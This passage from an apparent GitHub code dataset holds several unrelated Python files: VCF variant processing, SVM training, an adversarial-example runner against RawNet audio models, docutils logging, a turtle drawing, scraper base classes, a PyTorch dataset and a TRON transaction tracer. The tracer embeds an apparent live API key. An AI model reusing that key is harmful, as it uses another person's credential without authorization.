Mandatory parameter\n parser.add_argument(\"limit\", type=int, help=\"Limit parameter (must be an int < 10)\")\n\n # Optional parameters\n parser.add_argument(\"--start\", type=int, help=\"Start parameter\")\n parser.add_argument(\"--end\", type=int, help=\"End parameter\")\n parser.add_argument(\"--minDP\", type=int, help=\"minDP parameter\")\n\n args = parser.parse_args()\n\n # Validate limit parameter\n if args.limit >= 10 or args.limit < 0:\n parser.error(\"Limit must be an integer less than 10.\")\n\n return args\n\n\ndef process_vcf_line(line, header_lines, CHROM_index, REF_index, 
ALT_index, father_index, mother_index, proband_index,\n                     POS_index, INFO_index, start, end, minDP):\n    fields = line.strip().split('\\t')\n    if is_between(int(fields[POS_index]), start, end):\n        if verify_DP(fields[INFO_index], minDP):\n            sample = f\"{fields[father_index]} {fields[mother_index]} {fields[proband_index]}\"\n            new_info = f\"{fields[INFO_index]};GENE={get_variant_gene(fields[CHROM_index], int(fields[POS_index]), fields[REF_index], fields[ALT_index], 'hg19')}\"\n            fields[INFO_index] = new_info\n            new_line = \"\\t\".join(fields)\n            create_file(sample, header_lines, new_line)\n\n\ndef main():\n    args = parse_vcf_arguments()\n\n    print(\"Parsed parameters:\")\n    print(f\"Limit: {args.limit}\")\n    print(f\"Start: {args.start}\")\n    print(f\"End: {args.end}\")\n    print(f\"minDP: {args.minDP}\")\n\n    # URL of the gzipped VCF file\n    url = \"https://s3.amazonaws.com/resources.genoox.com/homeAssingment/demo_vcf_multisample.vcf.gz\"\n    response = requests.get(url, stream=True)\n\n    header_lines = []\n    if response.status_code == 200:\n        # Create a stream to read the gzipped content\n        compressed_stream = BytesIO(response.content)\n        with gzip.GzipFile(fileobj=compressed_stream, mode='rb') as gzipped_file:\n\n            for line in gzipped_file:\n                line = line.decode('utf-8').rstrip()\n                if line.startswith(\"#CHROM\"):\n                    header_lines.append(line)\n                    header = line.strip().split('\\t')\n                    CHROM_index = header.index(\"#CHROM\")\n                    REF_index = header.index(\"REF\")\n                    ALT_index = header.index(\"ALT\")\n                    father_index = header.index(\"father\")\n                    mother_index = header.index(\"mother\")\n                    proband_index = header.index(\"proband\")\n                    POS_index = header.index(\"POS\")\n                    INFO_index = header.index(\"INFO\")\n                    break\n                elif line.startswith('#'):\n                    header_lines.append(line)\n            for line in gzipped_file:\n                line = line.decode('utf-8').rstrip()\n                process_vcf_line(line, header_lines, CHROM_index, REF_index, ALT_index, father_index, mother_index,\n                                 proband_index, POS_index, INFO_index, args.start, args.end, args.minDP)\n\n    else:\n        print(\"Failed to download the file:\", response.status_code)\n\n    print(\"Finished successfully\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"SemionChi/VCF_processing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71543284705","text":"from sklearn.cross_validation import KFold\nfrom sklearn.externals import joblib\nfrom sklearn import grid_search\nfrom sklearn.svm import SVC\nimport numpy as np\nimport pandas\n\ndata_face = pandas.read_csv(\"daisy/daisy_features_face.csv\", header=None)\ndata_le = pandas.read_csv(\"daisy/daisy_features_le.csv\", header=None)\ndata_re = pandas.read_csv(\"daisy/daisy_features_re.csv\", header=None)\ndata_nose = pandas.read_csv(\"daisy/daisy_features_nose.csv\", header=None)\n\nX = pandas.concat([data_face.iloc[:, :-1], data_le.iloc[:, :-1], data_re.iloc[:, :-1], data_nose.iloc[:, :-1]], axis=1)\ny = data_face.iloc[:, -1]\n\n\nprint(data_face.shape, data_le.shape, data_re.shape, data_nose.shape)\nprint(X.shape)\ny = [int(x) for x in y.tolist()]\nprint(y)\n\ndef train(grid, X, y):\n    print('Tuning hyper-parameters with {0} kernel'.format(grid['kernel'][0]))\n\n    cv = KFold(len(y), n_folds=5, shuffle=True, random_state=241)\n    gs = grid_search.GridSearchCV(SVC(random_state=241, decision_function_shape='ovr'), grid, scoring='accuracy', cv=cv, verbose=3)\n    gs.fit(X, y)\n\n    print('Model training is finished.\\n')\n    print('Best params: 
{0}. Best score: {1}'.format(gs.best_params_, gs.best_score_))\n print(gs.get_params(deep=True))\n print('')\n joblib.dump(gs, './clfs/daisy/{0}/svm_daisy_clf.pkl'.format(grid['kernel'][0]))\n\ngrid1 = {\n 'kernel': ['linear'],\n 'C': np.power(10.0, np.arange(-5, 6))\n}\ngrid2 = {\n 'kernel': ['rbf'],\n # 'gamma': np.power(2.0, np.arange(-4, 5)),\n # 'C': np.power(10.0, np.arange(0, 6))\n 'gamma': np.power(2.0, np.arange(-10, 3)),\n 'C': np.power(10.0, np.arange(-2, 6))\n}\n# train(grid1, X, y)\n# train(grid2, X, y)","repo_name":"goodmove/FindyBot","sub_path":"src/image_processing/ML/daisy/est_daisy.py","file_name":"est_daisy.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"3373358760","text":"from Prove.paint_pgd_ens3 import paint_PGD_ens3\n\nimport Config.attackconfig as Config\nimport Config.globalconfig as Gconfig\nimport torch\nfrom RawNet56.model import RawNet as RawNet56\nfrom RawNet4.model import RawNet as RawNet4\nfrom RawNet4.model import RawNet as RawNet48\nfrom RawNet646.model import RawNet as RawNet646\nfrom RawNet726.model import RawNet as RawNet726\nimport yaml\n\nlabelPath = Config.TLABEL\ndatasetPath = Config.TPATH\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nmodel56_path = Config.RawNet56_model\nyaml56_path = Gconfig.RAW56_YAML_CONFIG_PATH\nwith open(yaml56_path, 'r') as f_yaml:\n parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\nmodel56 = RawNet56(parser1['model'], device)\nmodel56 = (model56).to(device)\nmodel56.load_state_dict(torch.load(model56_path, map_location=device))\nprint('Model loaded : {}'.format(model56_path))\n\n# model56_path2 = Config.RawNet56_model_2\n# with open(yaml56_path, 'r') as f_yaml:\n# parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\n# model56_2 = RawNet56(parser1['model'], device)\n# model56_2 = (model56_2).to(device)\n# model56_2.load_state_dict(torch.load(model56_path2, map_location=device))\n# print('Model loaded : {}'.format(model56_path2))\n#\nmodel4_path = Config.RawNet4_model\nyaml4_path = Gconfig.RAW4_YAML_CONFIG_PATH\nwith open(yaml4_path, 'r') as f_yaml:\n parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\nmodel4 = RawNet4(parser1['model'], device)\nmodel4 = (model4).to(device)\nmodel4.load_state_dict(torch.load(model4_path, map_location=device))\nprint('Model loaded : {}'.format(model4_path))\n\n# model48_path = Config.RawNet48_model\n# yaml48_path = Gconfig.RAW48_YAML_CONFIG_PATH\n# with open(yaml48_path, 'r') as f_yaml:\n# parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\n# model48 = RawNet48(parser1['model'], device)\n# model48 = (model48).to(device)\n# model48.load_state_dict(torch.load(model48_path, map_location=device))\n# print('Model loaded : {}'.format(model48_path))\n\nmodel726_path = Config.RawNet726_model\nyaml726_path = Gconfig.RAW726_YAML_CONFIG_PATH\nwith open(yaml726_path, 'r') as f_yaml:\n parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\nmodel726 = RawNet726(parser1['model'], device)\nmodel726 = (model726).to(device)\nmodel726.load_state_dict(torch.load(model726_path, map_location=device))\nprint('Model loaded : {}'.format(model726_path))\n\n# model646_path = Config.RawNet646_model\n# yaml646_path = Gconfig.RAW646_YAML_CONFIG_PATH\n# with open(yaml646_path, 'r') as f_yaml:\n# parser1 = yaml.load(f_yaml, Loader=yaml.FullLoader)\n# model646 = RawNet646(parser1['model'], device)\n# model646 = (model646).to(device)\n# model646.load_state_dict(torch.load(model646_path, 
map_location=device))\n# print('Model loaded : {}'.format(model646_path))\n\n#AdvsetPath = Config.RawNet56_Subens_CWAdvsetPath\nAdvsetPath =r\"F:\\Adversarial-1D\\AavSave\\Raw56\\SA-1D\\56-726-4-sn0-v0-step50-decay0-ngw-False\"\nNpsave=r\"F:\\Adversarial-1D\\Paint_Adv2\\temp\"\na = paint_PGD_ens3(\n    attackdir=datasetPath,savedir=AdvsetPath,grad_save_path=Npsave,\n    model=model56,model_few=model4,model_more=model726,\n    input_shape=(1, 1,56000),input_shape_more=(1,1,72600),\n    input_shape_few=(1,1,40000),\n    eps=0.05,alpha=0.001,steps=50)\n\na.attack()\ndel(a)\n","repo_name":"QRICKDD/SA","sub_path":"RawNet56/paint_prove_grad3.py","file_name":"paint_prove_grad3.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34025419179","text":"import logging\nfrom docutils import nodes\nfrom docutils.transforms import Transform\nfrom docutils.transforms.references import Substitutions\nfrom docutils.readers.standalone import Reader\n\nclass LogDocutilsMessages(Transform):\n    \"\"\"\n    Log system messages from docutils by applying a post-Transform after reading an rst block \n    \"\"\"\n    default_priority = 870\n\n    def apply(self):\n        # find all nodes, so we can try and actually log the markup that caused the problem \n        for node in tuple(self.document.findall(nodes.problematic)): \n            #locate the node that corresponds to the problem\n            for m in self.document.parse_messages:\n                if node.get('refid') in m.get('ids'): \n                    #strip all the docutils gumph, just get the message\n                    system_message = m.children[0].astext() + '\\n'\n                    #try and grab some surrounding context \n                    try: \n                        context_before = node.previous_sibling().pformat()\n                    except (AttributeError, IndexError): \n                        context_before = ''\n                    \n                    try: \n                        context_after = node.parent[\n                            node.parent.index(node) + 1\n                        ].pformat()\n                    except IndexError: \n                        context_after = ''\n                    \n                    logging.warning('reStructuredText sadness: ' \n                                    + system_message \n                                    + context_before \n                                    + node.pformat() \n                                    + context_after) \n            \n    \n\nclass LoggingDocutilsReader(Reader): \n    '''\n    Exists only to attach our logging transform to the reading process \n    '''\n    def get_transforms(self): \n        return Reader.get_transforms(self) + [Substitutions] + [LogDocutilsMessages] \n","repo_name":"flucoma/flucoma-docs","sub_path":"flucoma/doc/rst/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"41848996196","text":"import random\nfrom turtle import *\nimport time\n\nCOLOR = (0.2039215686, 0.3409803922, 0.5921568627)\nTARGET = (0, 0.7, 0.99218)\n\nscreen = Screen()\nscreen.tracer(False)\n\nWIDTH, HEIGHT = 700, 500\n\ndeltas = [(hue - COLOR[index]) / HEIGHT for index, hue in enumerate(TARGET)]\n\nturtle = Turtle()\nturtle.color(COLOR)\n\nturtle.penup()\nturtle.goto(-WIDTH/2, HEIGHT/2)\nturtle.pendown()\n\ndirection = 1\n\nfor distance, y in enumerate(range(HEIGHT//2, -HEIGHT//2, -1)):\n\n    turtle.forward(WIDTH * direction)\n    turtle.color([COLOR[i] + delta * distance for i, delta in enumerate(deltas)])\n    turtle.sety(y)\n\n    direction *= -1\n\nscreen.tracer(True)\n\n\npenup()\ncolor(\"white\", \"white\")\nsetup(width=700, height=500, startx=None, starty=None)\npenup()\n\npenup()\ngoto(-330,225)\npendown()\nbegin_fill()\nsignal = input(str(\"(max 5)(as int)what signal strength = \"))\ncircle(10, 
extent=None, steps=None)\npenup()\nif signal == \"1\":\n    end_fill()\nforward(25)\npendown()\ncircle(10, extent=None, steps=None)\npenup()\nif signal == \"2\":\n    end_fill()\nforward(25)\npendown()\ncircle(10, extent=None, steps=None)\npenup()\nif signal == \"3\":\n    end_fill()\nforward(25)\npendown()\ncircle(10, extent=None, steps=None)\npenup()\nif signal == \"4\":\n    end_fill()\nforward(25)\npendown()\ncircle(10, extent=None, steps=None)\npenup()\nend_fill()\n \n\nforward(25)\nright(90)\nforward(2)\nleft(90)\npendown()\nmobileCarr = input(\"what is your mobile carrier = \").upper()\nwrite(mobileCarr, font=(\"Arial\", 13 ,\"normal\"))\n\npenup()\ngoto(230, 225)\npendown()\nbatper = input(\"battery percentage = \")\nwrite(batper + \"%\", font=(\"Arial\", 13 ,\"normal\"))\npenup()\ngoto(275, 228)\n#drawing battery outline\npendown()\nforward(35)\nleft(90)\nforward(5)\nright(90)\nforward(2)\nleft(90)\nforward(5)\nleft(90)\nforward(2)\nright(90)\nforward(5)\nleft(90)\nforward(35)\nleft(90)\nforward(15)\n#drawing percentage\nbatPerIn = (int(batper)/35)* 12.25\nbegin_fill()\nleft(90)\nforward(int(batPerIn))\nleft(90)\nforward(15)\nleft(90)\nforward(int(batPerIn))\nleft(90)\nforward(15)\nend_fill()\npenup()\n \ngoto(-330, 190)\n\ncolor(\"lightblue\", \"lightblue\")\nbegin_fill()\nleft(135)\npendown()\nforward(25)\nright(90)\nforward(5)\nright(90)\nforward(20)\nleft(90)\nforward(20)\nright(90)\nforward(5)\nright(90)\nforward(25)\nend_fill()\npenup()\n\ngoto(-300, 172)\nwrite(\"Heart Rate\", font=(\"Arial\", 20 ,\"normal\"))\ncolor(\"white\", \"white\")\n\ngoto(-65, 170)\nday = input(\"what is the day of the week = \")\nwrite(day, font=(\"Arial\", 20 ,\"normal\"))\n\ngoto(-110, 119)\ncolor(\"pink\", \"pink\")\nwrite(\"♥\", font=(\"Arial\", 20 ,\"normal\"))\ngoto(-85, 122)\ncolor(\"white\", \"white\")\nwrite(\"Beats Per Minute\", font=(\"Arial\", 15 ,\"normal\"))\n\ngoto(-330, 50)\nwrite(\"175\", font=(\"Arial\", 13 ,\"normal\"))\nright(45)\nforward(10)\nright(90)\nforward(40)\npendown()\nforward(610)\npenup()\n\ngoto(-330, -75)\nwrite(\"125\", font=(\"Arial\", 13 ,\"normal\"))\nleft(90)\nforward(10)\nright(90)\nforward(40)\npendown()\nforward(610)\npenup()\n\ngoto(-330, -200)\nwrite(\"50\", font=(\"Arial\", 13 ,\"normal\"))\nleft(90)\nforward(10)\nright(90)\nforward(40)\npendown()\nforward(610)\npenup()\n\ngoto(-250, -230)\nworkoutStartHour = input(\"What hour did you start your workout? = \")\nworkoutStartMin = input(\"How many minutes of the hour did you start your workout? = \")\nwrite(workoutStartHour+\":\"+workoutStartMin, font=(\"Arial\", 13 ,\"normal\"))\n\ngoto(250, -230)\nworkoutEndHour = input(\"What hour did you end your workout? = \")\nworkoutEndMin = input(\"How many minutes of the hour did you end your workout? 
= \")\nwrite(workoutEndHour+\":\"+workoutEndMin, font=(\"Arial\", 13 ,\"normal\"))\n\n#making line\nyPoints = [-160, -155, -140, -155, -130, -110, -120, -80, -100, -50, -60, -20, 0, 10, -20, 15, 5, 20, 0, 30, 10, 40, 20, 26, 10, 45, -30, -25,-10, -32, 10, 0, 20, 15, 30, 25, 40, 45, 30, 40, 20, 45, 15, 20, 10, 25, 20, 35, 30 ,45, 40 ,30, 35, 20, -30, -50, -40, -10, 10, 20, 5, 20, 15, 30 ,45, 35, 50, 40 ,49, 55, 40, 50, 45, 30, 40, 20, 25, 25, 10, 0, 7, 10, 15, 10, 15, 10, 5, 0 , -10, 5, -15 - 30, -20, -40, -50, -40, -100, -130, -120, -150, -140, -160, -150, -160, -140, -160, -150, -160, -140, -160]\n\ncolor(\"red\", \"black\")\npenup()\npensize(6)\ncurX = -250\ncurY = 250\nxStep = 5\ngoto(-250, -160)\nprint(\"plotting...\") \n\noption = input(\"do you want to use presets or plot your own (enter preset or own) = \").lower()\n\nif option == \"preset\":\n for i in yPoints: \n pendown()\n curY = i\n randNum = random.randint(-5, 10)\n randY = i + randNum\n print(curX, \",\", randY)\n goto(curX, randY)\n curX = curX + xStep\n time.sleep(0.25)#comment out to make plotting faster or change \nelse:\n x = 0\n while x < len(yPoints):\n pendown()\n Y = input(\"enter next y point(50=170bpm/-160=70bpm) or undo = \")\n if Y == \"undo\":\n undo()\n else:\n print(curX, \",\", Y)\n goto(curX, int(Y))\n curX = curX + xStep\n time.sleep(0.25)#comment out to make plotting faster or change\n x = x + 1\npenup()\ngoto(-1000, 1000)\n\ndone()\n","repo_name":"Dom-HTML/Fitbit-Fake","sub_path":"Fitbit-Fake.py","file_name":"Fitbit-Fake.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"73659219744","text":"from abc import ABC\nfrom typing import List\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver import Chrome, ChromeOptions\nfrom selenium.webdriver.support.expected_conditions import (\n visibility_of_all_elements_located, visibility_of_element_located)\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.remote.webelement import WebElement\n\nclass SeleniumScraperBase(ABC):\n '''\n 動的なサイトをスクレイピングする場合は、このクラスを継承。\n '''\n\n def __init__(self, executable_path: str, visible : bool = False, wait_time: float = 10):\n \"\"\"\n Parameters\n ----------\n executable_path : str\n chrome driverまでのパス\n visible : bool, default False\n ブラウザを起動して動作させるかのフラグ\n wait_time : float, default 10\n タイムアウトまでの時間\n \"\"\"\n self.option = ChromeOptions()\n if not visible:\n self.option.add_argument('--headless')\n self.option.add_experimental_option(\n 'excludeSwitches', ['enable-logging'])\n self.option.use_chromium = True\n self.driver = Chrome(\n executable_path=executable_path, options=self.option)\n self.driver.implicitly_wait(wait_time)\n self.wait = WebDriverWait(self.driver, wait_time)\n\n def __del__(self):\n self.driver.close()\n\n def _visit_page(self, url) -> None:\n self.driver.get(url)\n\n def _get_element(self, by, text) -> WebElement:\n return self.wait.until(visibility_of_element_located((by, text)))\n\n def _get_elements(self, by, text) -> List[WebElement]:\n return self.wait.until(visibility_of_all_elements_located((by, text)))\n\n def _click(self, element) -> None:\n self.driver.execute_script(\"arguments[0].scrollIntoView(false);\", element)\n element.click()\n\n def _select(self, element, idx) -> None:\n select = Select(element)\n select.select_by_index(idx)\n\n\nclass SoupScraperBase(ABC):\n '''\n 
Inherit from this class when scraping static sites.\n    '''\n    def __init__(self, login_url: str = None, login_info: dict = None):\n        \"\"\"\n        Parameters\n        ----------\n        login_url : str, optional\n            URL of the login page to POST credentials to, by default None\n        login_info : dict, optional\n            Payload of login form fields for the POST request, by default None\n        \"\"\"\n        self.login = False\n        if (login_info is not None) and (login_url is not None):\n            self.login = True\n            self.session = requests.session()\n            self.session.post(login_url, data=login_info)\n\n    def _get_soup(self, url: str, encoding: str = None):\n        if self.login:\n            html = self.session.get(url)\n        else:\n            html = requests.get(url)\n        if encoding is not None:\n            html.encoding = encoding\n        content = html.content if self.login else html.text\n        soup = BeautifulSoup(content, \"html.parser\")\n        return soup\n\n    def _get_element(self, soup: BeautifulSoup, tag: str, by: str = None, text: str = None) -> BeautifulSoup:\n        attrs = {by: text} if by is not None else {}\n        return soup.find(tag, attrs=attrs)\n\n    def _get_elements(self, soup: BeautifulSoup, tag: str, by: str = None, text: str = None) -> List[BeautifulSoup]:\n        attrs = {by: text} if by is not None else {}\n        return soup.find_all(tag, attrs=attrs)\n","repo_name":"apiss2/scraping","sub_path":"scraping/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"17147005961","text":"# built-in\n# from pathlib import Path\n\n# third-party\nimport torch\nfrom torch.utils.data import Dataset\n\n\nclass GeoImageDataset(Dataset):\n    def __init__(\n        self, img_files: list, mask_files: list\n    ):  # img_dir: Path, mask_dir: Path, transform=None\n        self.img_files = img_files\n        self.mask_files = mask_files\n\n        # self.img_dir = img_dir\n        # self.mask_dir = mask_dir\n        # self.img_files = os.listdir(self.img_dir)\n        # self.mask_files = os.listdir(self.mask_dir)\n        # self.transform = transform\n\n    def __len__(self) -> int:\n        return len(self.img_files)\n\n    def __getitem__(self, idx: int) -> tuple:\n        # Load image\n        img_path = self.img_files[idx]\n        # mask and img_file have so far the same name\n        mask_path = self.mask_files[idx]\n        img = torch.load(img_path)\n        # converts bool mask into integer (0/1)\n        mask = torch.load(mask_path).long()\n        # Apply transform (if any)\n        # if self.transform:\n        #     img = self.transform(img)\n        return img, mask\n\n    # def __getitem__(self, idx: int) -> tuple:\n    #     # Load image\n    #     img_path = os.path.join(self.img_dir, self.img_files[idx])\n    #     # mask and img_file have so far the same name\n    #     mask_path = os.path.join(self.mask_dir, self.img_files[idx])\n    #     img = torch.load(img_path)\n    #     # converts bool mask into integer (0/1)\n    #     mask = torch.load(mask_path).long()\n    #     # Apply transform (if any)\n    #     # if self.transform:\n    #     #     img = self.transform(img)\n\n    #     return img, mask\n","repo_name":"Taraman12/Solarpark-detection","sub_path":"src/ML_Modell/dataset_class.py","file_name":"dataset_class.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"6750858199","text":"import requests\n\ndef trace_destination(source_address, api_key):\n    current_address = source_address\n    while True:\n        transaction = find_transaction_by_input(current_address, api_key)\n        if transaction is None:\n            return current_address\n        current_address = transaction['raw_data']['contract'][0]['parameter']['value']['to_address']\n\ndef find_transaction_by_input(input_address, api_key):\n    url = 
f'https://api.trongrid.io/v1/accounts/{input_address}/transactions'\n    headers = {'TRON-PRO-API-KEY': api_key}\n    while url is not None:\n        response = requests.get(url, headers=headers)\n        data = response.json()\n        transactions = data['data']\n        retry = 3\n        for transaction in transactions:\n            if transaction['raw_data']['contract'][0]['parameter']['value']['owner_address'] == input_address:\n                return transaction\n        url = data['meta']['links'].get('next')\n    return None\n\n\nprint(find_transaction_by_input(input_address=\"TWg9uE1CLRF8BVh94tQUsxbkeiLsgrg7rm\", api_key=\"8b0988e0-5691-42ef-9d56-945c33832a78\"))\n","repo_name":"Jain-Ayush-11/Kavach-2023","sub_path":"hops.py","file_name":"hops.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1420405309","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport inputProcessing\r\nimport ScenarioGeneratio\r\nfrom gurobipy import Model, Var, GRB, quicksum\r\nimport pdb\r\n#import ScenarioGeneratio \r\n\r\n\r\n\r\n\r\n\r\ndef solvePerfectInformation(gp, I, K, W, l_init, q_init, c_init):\r\n    GenAvg=0.0\r\n    UpAvg=0.0\r\n    SpAvg=0.0\r\n    RefAvg=0.0\r\n    FlrAvg=0.0\r\n    L_min= 50\r\n    L_max=1200\r\n    ub=np.zeros(K)\r\n    M=1000000 \r\n    T_R_down=2\r\n    T_F_down=4\r\n#    loop over all sample paths\r\n    for k in range(K):\r\n#        Model\r\n        perfectInfo = Model(\"GenAndUpg\")\r\n\r\n        Gen=[]\r\n        for x_G in range(I):\r\n            Gen.append(perfectInfo.addVar(lb=0 , vtype=GRB.CONTINUOUS, \r\n                                          obj=-W[x_G, k, 0]*gp[5]*np.power(gp[6], x_G),\r\n                                          name=\"Gen[%d]\" %x_G))\r\n        \r\n        Up=[] \r\n        for x_U in range(I):\r\n            Up.append(perfectInfo.addVar(lb=0, vtype=GRB.CONTINUOUS, \r\n                                         obj=gp[7]*np.power(gp[6], x_U),\r\n                                         name=\"Up[%d]\" %x_U))\r\n        \r\n        Sp=[] \r\n        for x_S in range(I):\r\n            Sp.append(perfectInfo.addVar(lb=0, vtype=GRB.CONTINUOUS, \r\n                                         obj=0,\r\n                                         name=\"Sp[%d]\" %x_S)) \r\n\r\n        Ref=[] \r\n        for x_R in range(I):\r\n            Ref.append(perfectInfo.addVar(lb=0, vtype=GRB.BINARY, \r\n                                          obj=gp[8]*np.power(gp[6],x_R),\r\n                                          name=\"Ref[%d]\" %x_R)) \r\n        \r\n        Gen_b=[]\r\n        for xi_G in range(I):\r\n            Gen_b.append(perfectInfo.addVar(lb=0, vtype=GRB.BINARY, \r\n                                            obj=0,\r\n                                            name=\"Gen_b[%d]\" %xi_G)) \r\n\r\n        Flr=[]\r\n        for xi_F in range(I):\r\n            Flr.append(perfectInfo.addVar(lb=0, vtype=GRB.BINARY, \r\n                                          obj=(100)* np.power(gp[6], xi_F),\r\n                                          name=\"Flr[%d]\" %xi_F)) \r\n\r\n        Cap=[]\r\n        for q in range(I):\r\n            Cap.append(perfectInfo.addVar(lb=0 , vtype=GRB.CONTINUOUS, \r\n                                          obj=0,\r\n                                          name=\"Cap[%d]\" %q)) \r\n        \r\n        Res=[]\r\n        for l in range(I):\r\n            Res.append(perfectInfo.addVar(lb= L_min, ub=L_max, vtype=GRB.CONTINUOUS, \r\n                                          obj=0,\r\n                                          name=\"Res[%d]\" %l)) \r\n        \r\n        Con=[]\r\n        for c in range(I):\r\n            Con.append(perfectInfo.addVar(lb=0 , ub=1, vtype=GRB.CONTINUOUS, \r\n                                          obj=0,\r\n                                          name=\"Con[%d]\" %c)) \r\n        #########################################################################\r\n        #robust part\r\n        \r\n        \r\n        \r\n        perfectInfo.modelSense = GRB.MINIMIZE\r\n        \r\n        \r\n        perfectInfo.addConstr(\r\n            (Res[0]- l_init == 0), \"initial reservoir\")\r\n        \r\n        \r\n        perfectInfo.addConstr(\r\n            (Cap[0]- q_init == 0), \"initial capacity\")\r\n        \r\n        \r\n        perfectInfo.addConstr(\r\n            (Con[0]- c_init == 0), \"initial condition\") \r\n        \r\n        for i in range(I): \r\n            perfectInfo.addConstr(\r\n                (Gen[i]- Cap[i] <= 0), \"Generation\")\r\n\r\n\r\n        for i in range(I): \r\n            perfectInfo.addConstr(\r\n                (Gen[i]- Res[i] <= 0)) \r\n\r\n        for i in range(I): \r\n            perfectInfo.addConstr(\r\n                (Up[i]- gp[4] * Ref[i] <= 0)) \r\n        \r\n\r\n        for i in 
range(I): \r\n            perfectInfo.addConstr(\r\n                ( Gen_b[i] + Ref[i] <= 1)) \r\n        \r\n        for i in range(I): \r\n            perfectInfo.addConstr(\r\n                ( Gen[i] - M* Gen_b[i] <= 0)) \r\n\r\n        for i in range(I): \r\n            perfectInfo.addConstr(\r\n                (Ref[i]- Flr[i] <= 0)) \r\n\r\n        for i in range(I): \r\n            perfectInfo.addConstr(\r\n                (quicksum(Gen[i+j] for j in range(min(T_R_down, I-i )))- M* (1-Ref[i]) <=0))\r\n        \r\n        for i in range(I): \r\n            perfectInfo.addConstr(\r\n                (quicksum(Gen[i+j] for j in range(min(T_F_down, I-i )))- M* (1-Flr[i]) <=0))\r\n        \r\n        for i in range(I-1):\r\n            perfectInfo.addConstr(\r\n                (Res[i+1]- Res[i]+ Gen[i] - W[i , k, 1] + Sp [i]==0 ))\r\n        \r\n        for i in range(I-1):\r\n            perfectInfo.addConstr(\r\n                (Cap[i+1]- Cap[i] - Up[i] ==0 ))\r\n        \r\n        for i in range(I-1):\r\n            perfectInfo.addConstr(\r\n                (Con[i+1]- Con[i] - W[i, k, 2]* Gen_b[i] -(0- Con[i])* Ref[i] ==0 ))\r\n        \r\n        perfectInfo.write('GenAndUpg.lp') \r\n        \r\n        \r\n        perfectInfo.optimize() \r\n        print('Up[0]: {}, Sp[0]:{}, Ref[0]:{}, Flr[0]:{} \\n'. format(\r\n                Up[0].x, Sp[0].x, Ref[0].x, Flr[0].x ))\r\n        print('Power: {}, Inflow: {}, Deterioration: {}\\n'. format(\r\n                W[i, 0, 0], W[i, 0, 1], W[i, 0, 2] )) \r\n        \r\n        print('Sample path: {:.4f}'.format(\r\n                k ))\r\n        if perfectInfo.status == GRB.Status.OPTIMAL:\r\n            print('Optimal objective: %g' % perfectInfo.objVal)\r\n            ub[k]= -perfectInfo.objVal\r\n#        else:\r\n#            ub[k]= M\r\n        elif perfectInfo.status == GRB.Status.INF_OR_UNBD:\r\n            print('Model is infeasible or unbounded')\r\n            exit(0)\r\n        elif perfectInfo.status == GRB.Status.INFEASIBLE:\r\n            print('Model is infeasible')\r\n            exit(0)\r\n        elif perfectInfo.status == GRB.Status.UNBOUNDED:\r\n            print('Model is unbounded')\r\n            exit(0)\r\n        else: \r\n            print('Optimization ended with status %d' % perfectInfo.status)\r\n        \r\n        #referring to decisions at current period\r\n   #     pdb.set_trace() \r\n        GenAvg+= Gen[0].x\r\n        print('Optimal generation: {:.4f}'. 
format( Gen[0].x))\r\n UpAvg+= Up[0].x\r\n SpAvg+= Sp[0].x\r\n RefAvg+= Ref[0].x \r\n FlrAvg+= Flr[0].x\r\n \r\n # average of actions in the sample paths \r\n GenAvg=GenAvg/K\r\n UpAvg=UpAvg/K\r\n SpAvg=SpAvg/K\r\n RefAvg= RefAvg/K\r\n FlrAvg=FlrAvg/K\r\n \r\n if RefAvg> 0.5:\r\n RefAvg=1\r\n UpAvg= UpAvg\r\n GenAvg= 0\r\n else:\r\n RefAvg=0\r\n UpAvg=0\r\n\r\n \r\n XAvg=[GenAvg, UpAvg, SpAvg, RefAvg, FlrAvg]\r\n \r\n return ub, XAvg \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n","repo_name":"DanialTaheri/DualReoptimization-with-TerminalValue","sub_path":"PerfectInformation.py","file_name":"PerfectInformation.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31618208025","text":"import argparse\nimport requests\nfrom lxml import html\nimport time\nfrom price_parser import Price\nimport multiprocessing\n#from multiprocessing import Pool\n\n# automatically reads in the next unread line so no need for a line number parameter\ndef line_from_csv(f):\n ln = f.readline()\n if ln == \"\":\n return None\n print( \"line: \", ln, end = \"\" )\n i = 0\n li = 0\n parsed_line = []\n while True:\n start = i\n while( i < len(ln) and ln[i] != ',' ):\n i = i + 1\n if i < len(ln):\n parsed_line.insert( li, ln[start:i] )\n li = li + 1\n i = i + 1\n if i >= len(ln):\n break\n return parsed_line\n\ndef process_file(file_path):\n file_name = file_path\n fi = open(file_name, \"r\") # r stands for read\n 